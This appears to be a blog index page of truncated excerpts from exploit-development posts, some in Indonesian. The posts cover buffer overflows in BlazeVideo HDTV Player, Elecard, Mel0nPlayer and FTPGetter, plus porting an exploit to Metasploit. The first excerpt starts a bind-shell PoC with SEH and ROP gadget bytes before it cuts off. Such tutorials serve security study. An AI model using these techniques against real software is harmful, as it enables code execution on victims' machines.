BlazeVideo HDTV Player 6.x Buffer Overflow (another version)
Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal. Take a look at mona.py awesome tool developed by corelanc0d3r and his team So here is the poc, it will bind to port 31337 #!/usr/bin/python import struct file = 'blazevideo-universal.plf' totalsize = 5000 junk = 'A' * 872 align = 'B' * 136 #we don't need nseh seh = '\x4a\x53\x30\x61' # ADD ESP,800 # RETN rop = '\x03\x60\x32\x61' * 10 # RETN (ROP NOP) rop+= '\x7a\x34\x05\x64' # POP EDX # RETN rop+=...
read morePorting Your Exploit to Metasploit
Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit. Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut: junk = "\x41" * 4112 # jumlah sampah yang...
read moreSEH Based Stack Overflow – The Basic
Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut: Structured Exception Handling Win32 Exception handling for assembler programmers Tidak ada yang lebih menyenangkan daripada belajar sambil mencoba Kita akan mencoba SEH based stack overflow pada program yang pernah di post oleh sickness, yaitu Elecard AVC_HD/MPEG Player. Program Elecard AVC_HD/MPEG Player versi 5.7 menderita buffer overflow ketika mencoba load file .m3u yang ditambahkan sejumlah karakter. Percobaan ini akan dilakukan pada...
read moreMel0nPlayer 1.0.11.x Denial of Service POC
Software Description Mel0n Player is a famous software in Indonesia to play songs that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your local computer or by online streaming to the portal Melon. The songs can also be downloaded to your local computer. Vulnerable Information The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file as part of skin...
read moreFTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system. The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client makes a connection to a malicious server that is running PASV mode. The PASV command is issued to tell the server that the client wishes to transfer files in passive mode. FTP servers that support passive mode will respond to such a request with an IP address and port number. Successful exploitation allows execution of arbitrary code, but requires that the user...
read more